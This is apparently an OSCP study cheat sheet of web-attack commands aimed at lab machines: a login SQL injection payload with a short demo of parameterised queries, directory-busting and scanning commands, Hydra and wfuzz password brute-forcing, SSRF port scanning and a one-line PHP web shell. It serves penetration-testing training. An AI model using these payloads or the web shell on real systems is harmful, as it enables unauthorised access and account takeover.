HTTP OSCP

  • Post category:OSCP

Simple SQL Injection to try on login form

admin:' OR '1'='1
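As an added example (not part of the original post), here is the payload above run against a constructed SQLite login check, showing why a string-built query accepts it and a parameterised query does not:

```python
import sqlite3

# Constructed sample data for the demonstration; not from the original post.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cretPass!')")
    conn.commit()
    return conn

def build_vulnerable_sql(username, password):
    # String concatenation: user input becomes part of the SQL grammar.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(conn, username, password):
    # With the cheat-sheet payload the WHERE clause becomes
    #   username = 'admin' AND password = '' OR '1'='1'
    # and the always-true OR branch returns the admin row.
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row is not None

def login_hardened(conn, username, password):
    # Parameterised query: the input is bound as data, never parsed as SQL,
    # so the quote characters in the payload cannot change the query logic.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None

PAYLOAD = "' OR '1'='1"   # the login-form payload from the cheat sheet

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("admin", PAYLOAD))
    print("vulnerable login accepts payload:", login_vulnerable(db, "admin", PAYLOAD))
    print("hardened login accepts payload:  ", login_hardened(db, "admin", PAYLOAD))
```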

Using Nmap to scan for http exploits

sudo nmap --script "http-vul*" -p 80 <IP Address>

nmap -Pn -sV -sC -vvvvv -p 80 192.168.1.1

Curl Grab service banner

curl -i [IP]

Read robots.txt, a good place to find directories the site owner does not want indexed by Google

curl http://example.com/robots.txt

Using dirb to scan website directory for certain folders or files

dirb http://<IP Address>:PORT

dirb http://<IP address> -X .php,.html,.txt

dirb http://<IP address> -r

# Good options for a website where you want to ignore SSL certificate errors (-k)

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://10.10.10.7 -k -x txt,php,html -t 40

gobuster dir -u http://jail.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt

gobuster dir -u shocker.htb/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,pl,py

gobuster dir -u http://10.10.10.73 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx -t 30

WhatWeb

whatweb [IP]:[PORT] --color=never --log-brief="[OUTPUT].txt"

Nikto

nikto -host=http://10.0.0.1

SSL Scan

sslscan $RHOST

# dirsearch

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50

Check WebDav

davtest -url http://10.10.10.14

# Using Hydra to brute-force the admin user's password

hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/department/login.php:username=admin&password=^PASS^&proc_login=true:Incorrect password"

# wfuzz example: finding valid usernames (--hs hides responses containing the given string)

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt --hs "No account found with that username." -d "username=FUZZ&password=password" http://10.10.10.97/login.php

# wfuzz example: finding a known user's password

wfuzz -c -w /usr/share/wordlists/rockyou.txt --hs "The password you entered was not valid." -d "username=tyler&password=FUZZ" http://10.10.10.97/login.php

# Simple PHP shell

<?php echo system($_REQUEST["ipp"]); ?>

# wfuzz is a very good option to use instead of Burp Suite for this kind of request fuzzing

wfuzz -c -z range,1-65535 "http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ"

# Only show ports that are responding: --hl=2 hides responses with 2 lines, the baseline for a closed port

wfuzz -c -z range,1-65535 --hl=2 "http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ"

CeWL - CeWL creates custom wordlists by crawling a given URL and collecting the relevant words it finds. Such a list can be used to assist in brute-forcing web page logins.

Example Syntax:

If http:

cewl http://[IP]:[PORT]/ -m 6

If https:

cewl https://[IP]:[PORT]/ -m 6

wafw00f - Wafw00f identifies whether a particular web address is behind a web application firewall.

Example Syntax:

If http:

wafw00f http://[IP]:[PORT]

If https:

wafw00f https://[IP]:[PORT]

Gobuster - Gobuster is a directory/file busting tool for websites written in Go. This tool can be run multiple ways, but two main busting strategies are almost always used:

Utilize a wordlist of common files/directories.

Utilize a wordlist of common cgis.

Common Directory Busting Example Syntax (gobuster v3 syntax; when -s is given, the default 404 blacklist must be cleared with -b ""):

If http:

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://[IP]:[PORT] -s "200,204,301,307,403,500" -b ""

If https:

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u https://[IP]:[PORT] -s "200,204,301,307,403,500" -b ""

Common CGI Busting Example Syntax:

If http:

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt -u http://[IP]:[PORT] -s "200,204,301,307,403,500" -b ""

If https:

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt -u https://[IP]:[PORT] -s "200,204,301,307,403,500" -b ""